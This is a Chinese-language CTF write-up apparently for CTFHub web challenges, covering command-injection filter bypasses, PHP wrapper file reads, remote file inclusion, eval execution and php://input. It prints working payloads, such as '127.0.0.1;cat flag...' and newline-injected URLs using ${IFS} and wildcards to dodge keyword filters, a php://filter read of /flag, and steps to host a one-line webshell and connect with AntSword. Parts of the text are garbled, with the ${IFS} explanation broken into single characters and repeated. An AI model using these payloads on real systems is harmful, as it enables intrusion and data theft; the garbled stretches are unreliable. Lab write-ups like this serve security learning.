过滤运算符
过滤了\和&那么尝试;
成功那么将flag cat出来
127.0.0.1;cat flag_27249269530391.php
得到flag
综合过滤练习
这次过滤有点多过滤了&;空格flag,cat,ctfhub
但是没有过滤%0a,%0d,用
I
F
S
取
代
空
格
,
用
{IFS}取代空格,用
IFS取代空格,用*绕过关键词过滤,因为在没有定义的情况下,$*在shell命令执行下为空
回显有一个flag_is_here文件夹
payload:http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd${IFS}fl*ag_is_here%0Als#这里ls是对flag_is_here目录进行操作,所有ls 是在cd flag_is_here执行后在flag_is_here目录下执行,这里拼接的就得用%0a换行符,可以等效&&,不能用%0d,%0d等效于&。
将flag tail出来
http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd
I
F
S
f
l
?
a
g
i
s
h
e
r
e
{IFS}fl*ag_is_here%0Atail
IFSfl?agi?sh?ere{IFS}fl*ag_126912367811026.php#
得到flag
读取源代码
进入环境源码直接给了出来分析代码尝试使用伪协议来读取
?file=php://filter/read=convert.base64-encode/resource=/flag
将读取出来的字符串进行base64解码
flag出现
远程包含
根据题意我们首先在服务器中创建一个文件夹然后编辑一个一句话木马
python启动一个http服务
然后使用蚁剑连接即可
eval执行
题目一进去就把源码给了出来
测试了一下函数能直接运行
将flag cat出来
文件包含
进入题目点击shell
源代码如上
根据题意文件包含又提供了shell,使用hackbar进行shell的使用
查看根目录发现flag
cat出来
php://input
进入题目题目将源码给了出来并且前六位必须为php://
根据题目得知需要使用php://input来解题
补充一个知识点
抓包使用php://input漏洞
cat flag
